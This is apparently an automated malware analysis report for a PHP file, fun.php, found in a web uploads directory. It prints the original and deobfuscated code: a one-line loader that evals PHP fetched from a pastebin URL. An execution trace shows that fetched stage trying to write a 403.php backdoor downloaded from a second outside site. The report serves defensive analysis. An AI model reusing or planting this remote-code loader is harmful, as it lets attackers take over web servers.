PHP Malware Analysis
fun.php
md5: 90929c386da39fded9d46d055f61d712
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- eval (Deobfuscated, Original, Traces)
Files
- file_get_contents (Deobfuscated, Original, Traces)
- file_put_contents (Traces)
URLs
- https://kerthibudaya.baliprov.go.id/css/403.txt (Traces)
- https://pastebin.com/raw/PTM6PkWe (Deobfuscated, Original, Traces)
Deobfuscated PHP code
<?php
echo @eval("?>" . file_get_contents("https://pastebin.com/raw/PTM6PkWe"));Execution traces
data/traces/90929c386da39fded9d46d055f61d712_trace-1676253530.9796.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:59:16.877422]
1 0 1 0.000154 393512
1 3 0 0.000200 393576 {main} 1 /var/www/html/uploads/fun.php 0 0
2 4 0 0.000216 393576 file_get_contents 0 /var/www/html/uploads/fun.php 1 1 'https://pastebin.com/raw/PTM6PkWe'
2 4 1 0.046398 395336
2 4 R '<?php file_put_contents("403.php", file_get_contents("https://kerthibudaya.baliprov.go.id/css/403.txt"));?>'
2 5 0 0.046512 396360 eval 1 '?><?php file_put_contents("403.php", file_get_contents("https://kerthibudaya.baliprov.go.id/css/403.txt"));?>' /var/www/html/uploads/fun.php 1 0
3 6 0 0.046533 396360 file_get_contents 0 /var/www/html/uploads/fun.php(1) : eval()'d code 1 1 'https://kerthibudaya.baliprov.go.id/css/403.txt'
3 6 1 1.047483 396760
3 6 R FALSE
3 7 0 1.047537 396720 file_put_contents 0 /var/www/html/uploads/fun.php(1) : eval()'d code 1 2 '403.php' FALSE
3 7 1 1.047649 396792
3 7 R 0
2 5 1 1.047665 396720
2 5 R NULL
1 3 1 1.047679 395736
1.047712 316192
TRACE END [2023-02-12 23:59:17.925010]
Generated HTML code
<html><head></head><body></body></html>Original PHP code
<?=@eval("?>".file_get_contents("https://pastebin.com/raw/PTM6PkWe"));?>